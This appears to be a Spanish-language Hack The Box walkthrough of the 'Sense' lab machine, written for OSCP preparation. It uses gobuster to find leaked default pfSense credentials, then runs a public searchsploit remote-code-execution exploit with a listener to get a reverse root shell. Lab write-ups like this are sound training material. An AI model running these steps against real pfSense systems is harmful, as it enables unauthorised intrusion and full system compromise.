Hack the Box es una plataforma en línea para probar y mejorar tus habilidades en pruebas de penetración y ciberseguridad.
En esta serie de artículos mostraremos cómo los evaluadores junior completan algunas máquinas de Hack The Box en su camino hacia OSCP, una certificación muy conocida, respetada y requerida para muchos puestos de ciberseguridad. Los certificados OSCP son capaces de identificar las vulnerabilidades existentes y ejecutar ataques organizados de manera controlada. Pueden aprovechar o modificar el código de exploits existentes en su beneficio, realizar pivoting en la red y exfiltrar datos, y comprometer los sistemas debido a configuraciones deficientes.
¡Empecemos con la diversión!
Sense
Initial Foothold
El puerto 80 nos redirige al puerto 443, que tiene un login de PFSense
.
Al diablo con esta máquina, tienes que enumerar la página web usando la lista de palabras de dirbuster y buscar
para las extensiones de txt
:
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u https://10.10.10.60 -k -o gobuster/gobuster_txt.txt -x txt -t 50
Con eso, encontramos system-users.txt
que dice:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
Las credenciales reales son: Rohit:pfsense
.
De la fuerza bruta del gobuster, también encontramos changelog.txt
que dice que hay una vulnerabilidad sin parchear.
Raíz
Al iniciar sesión, vemos la versión para pfsense
: 2.1.3
.
Haciendo searchsploit pfsense
encontramos uno con ejecución remota de código para las versiones < 2.1.4.
- Refleja:
searchsploit -m 43560.py
. - Renombrarlo:
mv 43560.py exploit.py
. - Poner un puerto escucha:
cat -lnvp 12345
. - Dispara el exploit:
python3 exploit.py --rhost 10.10.10.60 --lhost 10.10.14.31 --lport 12345 --username rohit --password pfsense
. - Obtenemos un shell de root.